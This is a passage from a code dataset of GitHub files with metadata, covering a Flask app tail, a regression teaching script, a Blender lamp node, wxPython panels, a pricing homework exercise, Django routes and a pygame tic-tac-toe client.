depuración.\nif __name__ == \"__main__\":\n # Si no se proporciona un puerto, se usa el puerto 8000 por defecto.\n gPORT = gPORT if gPORT is not None else 8000\n print(\"Development server running in port: \", gPORT)\n app.run(\n host = \"0.0.0.0\",\n port = gPORT,\n debug = True\n )","repo_name":"JohanValero/TextZeroShotAPI","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10150,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"43582735791","text":"\r\n\r\n###############\r\n# Authored by Weisheng Jiang\r\n# Book 6 | From Basic Arithmetic to Machine Learning\r\n# Published and copyrighted by Tsinghua University Press\r\n# Beijing, China, 2022\r\n###############\r\n\r\n\r\n# single variate regression\r\n\r\n# initializations and download results \r\nimport pandas as pd\r\nimport pandas_datareader as web\r\nimport seaborn as sns\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport scipy.stats as stats\r\nimport pandas_datareader as web\r\nimport statsmodels.api as sm\r\n\r\n\r\ny_levels_df = web.get_data_yahoo(['AAPL'], start = '2020-01-01', end = '2020-12-31')\r\n\r\ny_levels_df.round(2).head()\r\ny_df = y_levels_df['Adj Close'].pct_change()\r\ny_df = y_df.dropna()\r\n\r\n\r\nx_levels_df = web.get_data_yahoo(['^GSPC'], start = '2020-01-01', end = '2020-12-31')\r\n\r\nx_levels_df.round(2).head()\r\nx_df = x_levels_df['Adj Close'].pct_change()\r\nx_df = x_df.dropna()\r\n\r\nx_df = x_df.rename(columns={\"^GSPC\": \"SP500\"})\r\n\r\n#%% OLS Regression\r\n\r\n# add a column of ones\r\nX_df = sm.add_constant(x_df)\r\n\r\nmodel = sm.OLS(y_df, X_df)\r\nresults = model.fit()\r\nprint(results.summary())\r\n\r\n#%% Obtain the ANOVA table \r\n\r\nfrom statsmodels.formula.api import ols\r\n\r\ndata = pd.DataFrame({'x': x_df['SP500'], 'y': y_df['AAPL']})\r\n\r\n# Fit the model\r\nmodel_V2 = ols(\"y ~ x\", data).fit()\r\n\r\nfrom statsmodels.stats.anova import anova_lm\r\nanova_results = anova_lm(model_V2, typ=1)\r\n\r\nprint(anova_results)\r\n\r\n#%% Analysis of Variance\r\n\r\ny_mean = y_df.mean()\r\n\r\n# Sum of Squares for Total, SST\r\nSST = ((y_df - y_mean)**2).sum()\r\nn = len(y_df)\r\n# degree of freedom total, DFT\r\nDFT = n - 1\r\n# mean square total, MST\r\nMST = SST/DFT\r\n\r\n# predicted\r\ny_hat = results.fittedvalues\r\n\r\ny_hat = y_hat.to_frame()\r\ny_hat = y_hat.rename(columns={0: 'AAPL'})\r\n \r\n# Sum of Squares for Regression, SSR\r\nSSR = ((y_hat - y_mean)**2).sum()\r\n# degrees of freedom for regression model\r\nDFR = 1\r\n# MSR: mean square regression\r\nMSR = SSR/DFR\r\n\r\n# Sum of Squares for Error, SSE\r\nSSE = ((y_df - y_hat)**2).sum()\r\n# degrees of freedom for error, DFE\r\nDFE = n - DFR - 1\r\n# mean squared error, MSE\r\nMSE = SSE/DFE\r\n\r\n\r\n#%% Goodness of fit\r\n\r\n# coefficient of determination, R squared\r\n\r\nR2 = SSR/SST\r\n\r\nR2_adj = 1 - MSE/MST\r\n\r\n#%% F-test\r\n\r\nF_test = MSR/MSE\r\n\r\nN = results.nobs\r\nk = results.df_model+1\r\ndfm, dfe = k-1, N - k\r\nF = results.mse_model / results.mse_resid\r\nimport scipy.stats as stats\r\np = 1.0 - stats.f.cdf(F,dfm,dfe)\r\n\r\n\r\nalpha = 0.01\r\n# F = 549.7\r\n# n = 252\r\n# D = 1\r\n# p = D + 1\r\n\r\nfdistribution = stats.f(p - 1, n - p) \r\n# build an F-distribution object\r\nf_critical = fdistribution.ppf(1 - alpha)\r\n\r\np_value = 1 - stats.f.cdf(F, p - 1, n - p)\r\n\r\n#%% visualization\r\nx_points = x_df.values.T\r\ny_points = y_df.values.T\r\ny_hat_points = y_hat.values.T\r\n\r\np = 
model.fit().params\r\n\r\n# generate x-values for regression line\r\nx = np.linspace(x_df.min(),x_df.max(),10)\r\n\r\nfig, ax = plt.subplots()\r\nplt.plot(x_points,y_points,'.'); \r\nplt.plot(x_points,y_hat_points,'+k'); \r\n\r\nplt.plot(x, p.const + p.SP500 * x,color = 'r')\r\nplt.plot(np.vstack((x_points,x_points)),\r\n np.vstack((y_points,y_hat_points)),\r\n color = [0.7,0.7,0.7]);\r\n\r\nplt.axis('scaled')\r\nplt.ylabel('y')\r\nplt.xlabel('x')\r\nplt.xlim([-0.15,0.15])\r\nplt.ylim([-0.15,0.15])\r\n","repo_name":"Visualize-ML/Book6_First-Course-in-Data-Science","sub_path":"Book6_Ch09_Python_Codes/Bk6_Ch09_02.py","file_name":"Bk6_Ch09_02.py","file_ext":"py","file_size_in_byte":3211,"program_lang":"python","lang":"en","doc_type":"code","stars":1194,"dataset":"github-code","pt":"54"} +{"seq_id":"31967566031","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom math import pi, sin, cos, sqrt, exp\nfrom scipy.fftpack import dst\n\nL = 101\nphi = 7.0\nalpha = 50\nc = 1\n\nf = lambda x: np.exp(-np.power(x-alpha,2)/(2*np.power(phi, 2))) / np.sqrt(2*pi*np.power(phi, 2))\n\nA = np.fromfunction(f, (L,))\nA[0] = A[-1] = 0\n\ndef fn(t, F):\n\txs = np.arange(0, L, 1)\n\tfF = dst(F)\n\tfor x in xs:\n\t\txs[x] = 0\n\t\tfor n in range(0, F.shape[0]):\n\t\t\txs[x] += fF[x] * cos(c*pi*n*t) * sin(pi*n*x/L)\n\treturn xs\n\nfig, ax = plt.subplots(2)\nax[0].plot(A)\nax[1].plot(fn(0, A))\nplt.show()\nexit()\n\nfig, ax = plt.subplots()\nplt.ion()\nplt.show()\n\nfor i in range(0,100):\n\tax.plot(fn(i/10.0, A))\n\tax.set_ylim(-10, 10)\n\tplt.draw()\n\tplt.pause(1)\n\tplt.cla()\n\tprint(i)\n","repo_name":"sondrehav/master","sub_path":"EchoSimPython/analytic.py","file_name":"analytic.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"37778237720","text":"# ##### BEGIN GPL LICENSE BLOCK #####\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n#\n# ##### END GPL LICENSE BLOCK #####\n\nfrom math import radians\nimport bpy\nfrom mathutils import Matrix\nfrom bpy.props import StringProperty, BoolProperty, EnumProperty, FloatProperty, IntProperty, FloatVectorProperty\nfrom sverchok.data_structure import node_id, Matrix_generate, updateNode, match_long_repeat, get_data_nesting_level, ensure_nesting_level\nfrom sverchok.node_tree import SverchCustomTreeNode\n\n\nclass SvLampOutNode(SverchCustomTreeNode, bpy.types.Node):\n \"\"\"\n Triggers: Lamp\n Tooltip: Generate Lamp objects\n \"\"\"\n\n bl_idname = \"SvLampOutNode\"\n bl_label = \"Lamp\"\n bl_icon = 'LIGHT' #\"OUTLINER_OB_LAMP\"\n\n replacement_nodes = [('SvLightViewerNode', None, None)]\n\n activate: BoolProperty(\n name=\"Activate\", default=True,\n description='When enabled this will process incoming data',\n update=updateNode)\n\n lamp_name: StringProperty(\n default='Lamp_Alpha',\n description=\"sets which base name the object will use\",\n update=updateNode)\n\n lamp_types = [\n (\"POINT\", \"Point\", \"Omnidirectional point light source\", \"LAMP_POINT\", 0),\n (\"SUN\", \"Sun\", \"Constant direction parallel light source\", \"LAMP_SUN\", 1),\n (\"SPOT\", \"Spot\", \"Directional cone light source\", \"LAMP_SPOT\", 2),\n (\"HEMI\", \"Hemi\", \"180 degrees constant light source (not supported in Cycles)\", \"LAMP_HEMI\", 3),\n (\"AREA\", \"Area\", \"Directional area light source\", \"LAMP_AREA\", 4)\n ]\n \n def update_type(self, context):\n is_spot = (self.type == 'SPOT')\n self.inputs['Spot Size'].hide_safe = not is_spot\n self.inputs['Spot Blend'].hide_safe = not is_spot\n updateNode(self, context)\n\n type: EnumProperty(\n name=\"Type\", description=\"Light source type\",\n items=lamp_types, default=\"POINT\", update=update_type)\n\n area_types = [\n (\"RECTANGLE\", \"Rectangle\", \"Rectangular area\", 0),\n (\"SQUARE\", \"Square\", \"Square area\", 1)\n ]\n\n def update_area_type(self, context):\n square = (self.type != 'AREA' or self.area_type == 'SQUARE')\n self.inputs['Size'].hide_safe = not square\n self.inputs['Size X'].hide_safe = square\n self.inputs['Size Y'].hide_safe = square\n updateNode(self, context)\n\n area_type: EnumProperty(\n name=\"Area type\", description=\"Area shape type\", default=\"RECTANGLE\",\n items=area_types, update=update_area_type)\n\n size: FloatProperty(\n name=\"Size\", description=\"Light source size\", default=0.1, update=updateNode)\n\n size_x: FloatProperty(\n name=\"Size X\", description=\"Light source size\", default=0.1, update=updateNode)\n \n size_y: FloatProperty(\n name=\"Size Y\", description=\"Light source size\", default=0.1, update=updateNode)\n\n spot_size: FloatProperty(\n name=\"Spot Size\", description=\"Angle of the spotlight beam (degrees)\",\n default=45.0, min=0.0, max=180.0, update=updateNode)\n\n spot_blend: FloatProperty(\n name=\"Spot Blend\", description=\"The softness of the spotlight edge\",\n default=0.15, min=0.0, max=1.0, update=updateNode)\n\n strength: FloatProperty(\n name=\"Strength\", description=\"Lamp power\",\n default=100.0, min=0.0, max=1000000, update=updateNode)\n\n show_cone: BoolProperty(\n name=\"Show cone\", description=\"Draw transparent cone in the 3D View\",\n default=False, update=updateNode)\n\n max_bounces: 
IntProperty(\n name=\"Max Bounces\", description=\"Maximum number of bounces the lamp will contribute to the render\",\n min=1, max=1000000, default=1024, update=updateNode)\n\n cast_shadow: BoolProperty(\n name=\"Cast shadow\", description=\"Lamp casts shadows\",\n default=True, update=updateNode)\n\n multiple_imporance: BoolProperty(\n name=\"Multiple importance\", description=\"Use multiple importance sampling for the lamp\",\n default=True, update=updateNode)\n\n use_nodes: BoolProperty(\n name=\"Use Nodes\", description=\"Use node tree instead of directly specified color\",\n default=True, update=updateNode)\n\n light_color: FloatVectorProperty(\n name=\"Color\", description=\"Light color\", update=updateNode,\n default=(1.0, 1.0, 1.0, 1.0), size=4, min=0.0, max=1.0, subtype='COLOR')\n\n emission_node_name: StringProperty(\n name=\"Emission Node\", description=\"Name of Emission node in the lamp shader, that contains Sthrength and Color inputs\",\n default=\"Emission\", update=updateNode)\n\n def sv_init(self, context):\n self.inputs.new('SvMatrixSocket', 'Origin')\n self.inputs.new('SvStringsSocket', 'Size').prop_name = 'size'\n\n i = self.inputs.new('SvStringsSocket', 'Size X')\n i.prop_name = 'size_x'\n i.hide_safe = True\n\n i = self.inputs.new('SvStringsSocket', 'Size Y')\n i.prop_name = 'size_y'\n i.hide_safe = True\n\n i = self.inputs.new('SvStringsSocket', 'Spot Size')\n i.prop_name = 'spot_size'\n i.hide_safe = True\n\n i = self.inputs.new('SvStringsSocket', 'Spot Blend')\n i.prop_name = 'spot_blend'\n i.hide_safe = True\n\n i = self.inputs.new('SvStringsSocket', 'Strength')\n i.prop_name = 'strength'\n\n color_socket = self.inputs.new('SvColorSocket', \"Color\")\n color_socket.prop_name = 'light_color'\n\n self.outputs.new('SvObjectSocket', 'Objects')\n\n def draw_buttons(self, context, layout):\n view_icon = 'LIGHT' if self.activate else 'ERROR'\n layout.prop(self, \"activate\", text=\"UPD\", toggle=True, icon=view_icon)\n layout.prop(self, 'lamp_name')\n layout.prop(self, 'type')\n if self.type == 'AREA':\n layout.prop(self, 'area_type')\n\n def draw_buttons_ext(self, context, layout):\n self.draw_buttons(context, layout)\n layout.prop(self, 'use_nodes')\n layout.prop(self, 'max_bounces')\n layout.prop(self, 'cast_shadow')\n layout.prop(self, 'multiple_imporance')\n if self.type == 'SPOT':\n layout.prop(self, 'show_cone')\n layout.prop(self, 'emission_node_name')\n\n def get_children(self):\n objects = bpy.data.objects\n objs = [obj for obj in objects if obj.type == 'LIGHT']\n # criteria, basename must be in object.keys and the value must be self.basemesh_name\n return [o for o in objs if o.get('basename') == self.lamp_name]\n\n def make_lamp(self, index, object):\n origin, size, size_x, size_y, strength, spot_size, spot_blend, color = object\n\n if get_data_nesting_level(color) == 2:\n color = color[0]\n if isinstance(size, (list, tuple)):\n size = size[0]\n if isinstance(size_x, (list, tuple)):\n size_x = size_x[0]\n if isinstance(size_y, (list, tuple)):\n size_y = size_y[0]\n if isinstance(strength, (list, tuple)):\n strength = strength[0]\n if isinstance(spot_size, (list, tuple)):\n spot_size = spot_size[0]\n if isinstance(spot_blend, (list, tuple)):\n spot_blend = spot_blend[0]\n\n scene = bpy.context.scene\n\n # ensure we use a collection\n collections = bpy.data.collections\n collection = collections.get(self.lamp_name)\n if not collection:\n collection = collections.new(self.lamp_name)\n bpy.context.scene.collection.children.link(collection)\n\n lamps_data = 
bpy.data.lights\n objects = bpy.data.objects\n name = self.lamp_name + \"_\" + str(index)\n\n if name in objects:\n lamp_object = objects[name]\n if lamp_object.data.type != self.type:\n lamp_object.data.type = self.type\n else:\n lamp_data = lamps_data.new(name = name, type = self.type)\n lamp_object = objects.new(name = name, object_data = lamp_data)\n collection.objects.link(lamp_object)\n\n lamp_object['idx'] = index\n lamp_object['madeby'] = self.name\n lamp_object['basename'] = self.lamp_name\n \n lamp_object.matrix_local = origin\n\n lamp = lamp_object.data\n\n lamp.type = self.type\n lamp.color = color[:3]\n if self.type in ('POINT', 'SUN', 'SPOT'):\n lamp.shadow_soft_size = size\n elif self.type == 'AREA' and self.area_type == 'SQUARE':\n lamp.shape = 'SQUARE'\n lamp.size = size\n elif self.type == 'AREA' and self.area_type == 'RECTANGLE':\n lamp.shape = 'RECTANGLE'\n lamp.size = size_x\n lamp.size_y = size_y\n \n if self.type == 'SPOT':\n lamp.spot_size = radians(spot_size)\n lamp.spot_blend = spot_blend\n lamp.show_cone = self.show_cone\n\n if lamp.cycles:\n lamp.cycles.max_bounces = self.max_bounces\n lamp.cycles.cast_shadow = self.cast_shadow\n lamp.cycles.use_multiple_importance_sampling = self.multiple_imporance\n lamp.use_nodes = True\n\n if self.emission_node_name and self.emission_node_name in lamp.node_tree.nodes:\n node = lamp.node_tree.nodes[self.emission_node_name]\n node.inputs['Strength'].default_value = strength\n if len(color) != 4:\n raise Exception(\"Color data must contain 4 floats (RGBA), not {}\".format(len(color)))\n node.inputs['Color'].default_value = color\n\n def process(self):\n\n if not self.activate:\n return\n\n origins = self.inputs['Origin'].sv_get()\n sizes_sq = self.inputs['Size'].sv_get()\n sizes_x = self.inputs['Size X'].sv_get()\n sizes_y = self.inputs['Size Y'].sv_get()\n spot_sizes = self.inputs['Spot Size'].sv_get()\n spot_blends = self.inputs['Spot Blend'].sv_get()\n strengths = self.inputs['Strength'].sv_get()\n colors = self.inputs['Color'].sv_get()\n # next is not needed\n # if get_data_nesting_level(colors) == 3:\n # colors = colors[0]\n\n objects = match_long_repeat([origins, sizes_sq, sizes_x, sizes_y, strengths, spot_sizes, spot_blends, colors])\n\n for index, object in enumerate(zip(*objects)):\n self.make_lamp(index, object)\n\n self.remove_non_updated_objects(index)\n\n objs = self.get_children()\n self.outputs['Objects'].sv_set(objs)\n\n def remove_non_updated_objects(self, obj_index):\n objs = self.get_children()\n objs = [obj.name for obj in objs if obj['idx'] > obj_index]\n if not objs:\n return\n\n lamps_data = bpy.data.lights\n objects = bpy.data.objects\n collection = bpy.data.collections.get(self.lamp_name)\n\n # remove excess objects\n for object_name in objs:\n obj = objects[object_name]\n obj.hide_select = False\n collection.objects.unlink(obj)\n objects.remove(obj, do_unlink=True)\n\n # delete associated lamps data\n for object_name in objs:\n lamps_data.remove(lamps_data[object_name])\n\n def load_from_json(self, node_data: dict, import_version: float):\n if import_version <= 0.08:\n self.type = node_data.get(\"lamp_type\", \"POINT\")\n\n\ndef register():\n bpy.utils.register_class(SvLampOutNode)\n\ndef unregister():\n bpy.utils.unregister_class(SvLampOutNode)\n","repo_name":"nortikin/sverchok","sub_path":"old_nodes/lamp_out.py","file_name":"lamp_out.py","file_ext":"py","file_size_in_byte":12119,"program_lang":"python","lang":"en","doc_type":"code","stars":2098,"dataset":"github-code","pt":"54"} 
+{"seq_id":"32616983138","text":"import wx\nfrom .text import SimpleText\nfrom .utils import pack, LEFT\n\nclass RowPanel(wx.Panel):\n \"\"\" a simple row panel with horizontal sizer\"\"\"\n def __init__(self, parent, **kws):\n wx.Panel.__init__(self, parent, **kws)\n self.sizer = wx.BoxSizer(wx.HORIZONTAL)\n\n def Add(self, item, expand=0, style=LEFT, padding=2):\n self.sizer.Add(item, expand, style, padding)\n\n def AddText(self, label, expand=0, style=LEFT,\n padding=2, **kws):\n self.sizer.Add(SimpleText(self, label, **kws),\n expand, style, padding)\n def pack(self):\n pack(self, self.sizer)\n\n\nclass GridPanel(wx.Panel):\n \"\"\"A simple panel with a GridBagSizer\"\"\"\n\n def __init__(self, parent, nrows=10, ncols=10, pad=2, gap=5,\n itemstyle=wx.ALIGN_CENTER, **kws):\n\n wx.Panel.__init__(self, parent, **kws)\n self.sizer = wx.GridBagSizer(nrows, ncols)\n self.sizer.SetVGap(gap)\n self.sizer.SetHGap(gap)\n\n self.irow = 0\n self.icol = 0\n self.itemstyle = itemstyle\n self.pad=pad\n\n def Add(self, item, irow=None, icol=None, drow=1, dcol=1, style=None,\n newrow=False, pad=None, **kws):\n \"\"\"add item with default values for col, row, and size\"\"\"\n if newrow:\n self.NewRow()\n if style is None:\n style = self.itemstyle\n if irow is None:\n irow = self.irow\n if pad is None:\n pad = self.pad\n if icol is None:\n icol = self.icol\n self.sizer.Add(item, (irow, icol), (drow, dcol), style, pad, **kws)\n self.icol = self.icol + dcol\n\n def AddMany(self, items, newrow=False, **kws):\n \"\"\"add items\"\"\"\n if newrow: self.NewRow()\n for item in items:\n self.Add(item, **kws)\n\n def AddManyText(self, items, newrow=False, **kws):\n \"\"\"add items\"\"\"\n if newrow: self.NewRow()\n for item in items:\n self.AddText(item, **kws)\n\n def NewRow(self):\n \"advance row, set col # = 0\"\n self.irow += 1\n self.icol = 0\n\n def AddText(self, label, newrow=False, dcol=1, style=None, **kws):\n \"\"\"add a Simple StaticText item\"\"\"\n if style is None:\n style = LEFT\n self.Add(SimpleText(self, label, style=style, **kws),\n dcol=dcol, style=style, newrow=newrow)\n\n def pack(self):\n tsize = self.GetSize()\n msize = self.GetMinSize()\n\n self.SetSizer(self.sizer)\n self.sizer.Fit(self)\n nsize = (10*int(1.1*(max(msize[0], tsize[0])/10)),\n 10*int(1.1*(max(msize[1], tsize[1])/10.)))\n self.SetSize(nsize)\n","repo_name":"newville/wxutils","sub_path":"wxutils/gridpanel.py","file_name":"gridpanel.py","file_ext":"py","file_size_in_byte":2687,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"5977875351","text":"'''\np1 : nama=>Budi, produk=> TV, jumlah=>3\n\np2 : nama=>Ani, produk=> AC, jumlah=>4\n\np3 : nama=>Siti, produk=> Kulkas, jumlah=>2\n\np4 : nama=>Dewi, produk=> AC, jumlah=>5\n\np5 : nama=>Andi, produk=> Kulkas, jumlah=>7\n\np6 : nama=>Dedi, produk=> AC, jumlah=>1\n\np7 : nama=>Sri, produk=> TV, jumlah=>4\n\nSemua pelanggan masukkan ke sebuah list dengan nama ar_pelanggan (Bobot Penilaian 5 Point)\n\nCetaklah Data Pembelian Pelanggan Menggunakan Nested Loop Dengan Data:\n\n- Nama Pelanggan(Bobot Penilaian 5 Point)\n\n- Produk Beli (Bobot Penilaian 5 Point)\n\n- Jumlah Beli (Bobot Penilaian 10 Point)\n\n- Harga Satuan: (Bobot Penilaian 20 Point)\n\n Gunakan kondisional if:\n\n (TV=>5 jt, AC=>6 jt, Kulkas=>7 jt)\n\n- Harga Kotor => Jumlah Beli x Harga Satuan (Bobot Penilaian 10 Point)\n\n- Diskon: (Bobot Penilaian 10 Point)\n\n Gunakan Tuple & List \n\n Jika Beli Produk Kulkas minimal 3 pcs dapat diskon 20% dari harga 
kotor,\n\n Selain itu diskon hanya 5% dari harga kotor\n\n- PPN => 11% x (Harga Kotor - Diskon) (Bobot Penilaian 10 Point)\n\n- Harga Bayar => (Harga Kotor + PPN) - Diskon (Bobot Penilaian 5 Point)\n'''\n\np1 = {\n \"nama\": \"Budi\",\n \"produk\": \"TV\",\n \"jumlah\": 3\n}\np2 = {\n \"nama\": \"Ani\",\n \"produk\": \"AC\",\n \"jumlah\": 4\n}\np3 = {\n \"nama\": \"Siti\",\n \"produk\": \"Kulkas\",\n \"jumlah\": 2\n}\np4 = {\n \"nama\": \"Dewi\",\n \"produk\": \"AC\",\n \"jumlah\": 5\n}\np5 = {\n \"nama\": \"Andi\",\n \"produk\": \"Kulkas\",\n \"jumlah\": 7\n}\np6 = {\n \"nama\": \"Dedi\",\n \"produk\": \"AC\",\n \"jumlah\": 1\n}\np7 = {\n \"nama\": \"Sri\",\n \"produk\": \"TV\",\n \"jumlah\": 4\n}\n\nar_pelanggan = [p1, p2, p3, p4, p5, p6, p7]\n\nfor pelanggan in ar_pelanggan:\n print(f\"nama: {pelanggan['nama']}\")\n print(f\"produk: {pelanggan['produk']}\")\n print(f\"jumlah: {pelanggan['jumlah']}\")\n\n if (pelanggan[\"produk\"] == \"TV\"):\n hargaSatuan = 5000000\n elif (pelanggan[\"produk\"] == \"AC\"):\n hargaSatuan = 6000000\n elif (pelanggan[\"produk\"] == \"Kulkas\"):\n hargaSatuan = 7000000 \n\n print(\"Harga Satuan : \", hargaSatuan)\n \n\n hargaKotor = pelanggan[\"jumlah\"] * hargaSatuan\n print(\"Harga Kotor : \", hargaKotor)\n\n diskon = (hargaKotor * 0.05, hargaKotor * 0.2)[pelanggan[\"produk\"] == \"Kulkas\" and pelanggan[\"jumlah\"] >= 3]\n print(\"Diskon : \",diskon)\n\n ppn = 0.11 * (hargaKotor - diskon)\n print(\"PPN : \",ppn)\n\n harga_bayar = (hargaKotor + ppn) - diskon\n print(\"Harga Bayar : \",harga_bayar)\n\n print(\"==============================\")","repo_name":"aldiramdhan/python-sem-1","sub_path":"Tugas/tugas1_ddp_rabu_Muhamad Aldi Ramdani_0110122170_SI08.py","file_name":"tugas1_ddp_rabu_Muhamad Aldi Ramdani_0110122170_SI08.py","file_ext":"py","file_size_in_byte":2459,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"70877263202","text":"from django.urls import path\nfrom .views import *\n\nurlpatterns = [\n path('', index, name='index'),\n path('about', about, name='about'),\n path('urgent_repairs', urgent_repairs, name='urgent_repairs'),\n path('d_dev', d_dev, name='d_dev'),\n path('exchange_fund', exchange_fund, name='exchange_fund'),\n path('restoration', restoration, name='restoration'),\n path('', show_category),\n]\n","repo_name":"SitnikSasha/Test_Site","sub_path":"JeweleryJew/main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"18498830112","text":"import time\nfrom pickle import dumps, loads\n\nimport pygame\n\nfrom game import Game\nfrom network import Network\nfrom player import Player\n\npygame.init()\npygame.font.init()\n\nBIG_FONT = pygame.font.SysFont(\"comicsans\", 50)\nSMALL_FONT = pygame.font.SysFont(\"comicsans\", 30)\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nRED = (255, 0, 0)\nBLUE = (0, 0, 255)\nGREEN = (0, 255, 0)\n\nWIDTH, TOTAL_HEIGHT = 600, 665\nHEIGHT = 600 # This is going to be the game board height, same as width. 
\n # The additionial height is for players' information.\nDIFF = TOTAL_HEIGHT - HEIGHT\nwindow = pygame.display.set_mode((WIDTH, TOTAL_HEIGHT))\npygame.display.set_caption(\"Tic Tac Toe\")\n\n\ndef redraw(win, game, p):\n win.fill(WHITE)\n if not game.connected():\n waiting_label = BIG_FONT.render(\n \"Waiting for opponent...\", 1, BLACK, True)\n win.blit(waiting_label, (win.get_width() // 2 - waiting_label.get_width() //\n 2, win.get_height() // 2 - waiting_label.get_height() // 2))\n else:\n game.board.draw(win)\n shape_label = SMALL_FONT.render(\n f\"Your Shape: {p.get_shape()}\", 1, BLACK)\n win.blit(shape_label, (5, HEIGHT + DIFF // 2 - 10))\n\n wins_label = SMALL_FONT.render(f\"Total Wins: {game.get_wins(p.get_id())}\", 1, BLACK)\n win.blit(wins_label, (win.get_width() -\n wins_label.get_width() - 5, HEIGHT + DIFF // 2 - 10))\n\n winner = game.get_winner()\n if winner != None: # The game ended\n pygame.draw.line(\n win, BLACK, game.get_winner_line_start(), game.get_winner_line_end(), 4)\n if winner.get_id() == p.get_id(): # We won\n winner_label = BIG_FONT.render(\"You Won :)\", 1, GREEN)\n win.blit(winner_label, (win.get_width() // 2 -\n winner_label.get_width() // 2, HEIGHT // 2))\n\n setting_label = winner_label = BIG_FONT.render(\n \"Setting up a new game.\", 1, GREEN)\n win.blit(setting_label, (win.get_width() // 2 -\n setting_label.get_width() // 2, HEIGHT // 2 + winner_label.get_height() + 5))\n else: # we lost\n loser_label = BIG_FONT.render(\"You Lost :(\", 1, RED)\n win.blit(loser_label, (win.get_width() // 2 -\n loser_label.get_width() // 2, HEIGHT // 2))\n setting_label = BIG_FONT.render(\n \"Setting up a new game.\", 1, RED)\n win.blit(setting_label, (win.get_width() // 2 -\n setting_label.get_width() // 2, HEIGHT // 2 + loser_label.get_height() + 5))\n elif game.is_draw():\n draw_label = BIG_FONT.render(\"Draw!\", 1, BLUE)\n win.blit(draw_label, (win.get_width() // 2 -\n draw_label.get_width() // 2, HEIGHT // 2))\n setting_label = BIG_FONT.render(\n \"Setting up a new game.\", 1, BLUE)\n win.blit(setting_label, (win.get_width() // 2 -\n setting_label.get_width() // 2, HEIGHT // 2 + draw_label.get_height() + 5))\n else: # game is stil going\n your_turn_label = SMALL_FONT.render(\"Your Turn\", 1, BLACK)\n his_turn_label = SMALL_FONT.render(\"His Turn\", 1, BLACK)\n if game.get_current_turn() == p.get_id():\n win.blit(your_turn_label, (win.get_width() // 2 -\n your_turn_label.get_width() // 2, HEIGHT + DIFF // 2 - 10))\n else:\n win.blit(his_turn_label, (win.get_width() // 2 -\n his_turn_label.get_width() // 2, HEIGHT + DIFF // 2 - 10))\n pygame.display.update()\n\n\ndef main():\n run = True\n FPS = 60\n BOARD_SIZE = 3\n clock = pygame.time.Clock()\n\n try:\n con = Network(\"192.168.1.33\", 6654)\n player = con.connect()\n except:\n print(\"[CLIENT] Failed creating connection. 
Quiting...\")\n quit()\n\n while run:\n clock.tick(FPS)\n try:\n game = con.send(\"get\")\n except:\n run = False\n break\n\n if (game == \"Q\"): # The other player exited the game\n window.fill(WHITE)\n quit_label = BIG_FONT.render(\n \"The other player has quit!\", 1, BLACK)\n window.blit(quit_label, (window.get_width() // 2 -\n quit_label.get_width() // 2, window.get_height() // 2))\n directing_label = BIG_FONT.render(\n \"Directing you to the main menu.\", 1, BLACK)\n window.blit(directing_label, (window.get_width() // 2 -\n directing_label.get_width() // 2,\n window.get_height() // 2 + quit_label.get_height() + 5))\n pygame.display.update()\n pygame.time.delay(3000)\n con.close()\n run = False\n break\n\n redraw(window, game, player)\n if game.done:\n try:\n pygame.time.delay(3000)\n con.send(\"reset\")\n except:\n break\n else:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n quit()\n if event.type == pygame.MOUSEBUTTONUP and game.connected() and \\\n game.get_current_turn() == player.get_id() and game.get_winner() == None:\n x, y = pygame.mouse.get_pos()\n if y < HEIGHT:\n j = (x // (WIDTH // BOARD_SIZE))\n i = (y // (WIDTH // BOARD_SIZE))\n if game.board.is_available(i, j):\n con.send(str(i) + \",\" + str(j))\n\n\ndef menu_screen():\n run = True\n clock = pygame.time.Clock()\n while run:\n clock.tick(60)\n window.fill(WHITE)\n start_label = BIG_FONT.render(\"Press anywhere to begin...\", 1, BLACK)\n window.blit(start_label, (window.get_width() // 2 -\n start_label.get_width() // 2, window.get_height() // 2 - 15))\n pygame.display.update()\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n quit()\n run = False\n if event.type == pygame.MOUSEBUTTONUP:\n run = False\n main()\n\n\nwhile True:\n menu_screen()\n","repo_name":"Amit12321/Online-TicTacToe","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":6613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72358973603","text":"\"\"\"Transform player data into CSV.\"\"\"\n\nimport csv\nimport os\n\nfrom loguru import logger\n\nfrom league_history_collector.collectors.models import League\n\n\ndef set_players(\n file_name: str, league: League, deduplicate: bool\n): # pylint: disable=too-many-locals,too-many-nested-blocks,too-many-branches\n \"\"\"Sets the players in the provided CSV. If the CSV already exists, players are loaded from file\n to help reduce duplicates.\n\n If deduplicate is true, if a (player name, position) combination is found in the CSV with only\n one id associated, then the id assigned in the League structure is ignored and the one from the\n file is used. If the CSV is assumed to contain the player ids on the most recent platform, then\n older league data would be migrated to use the newer player ids. If (player name, position) is\n found multiple times (i.e. 
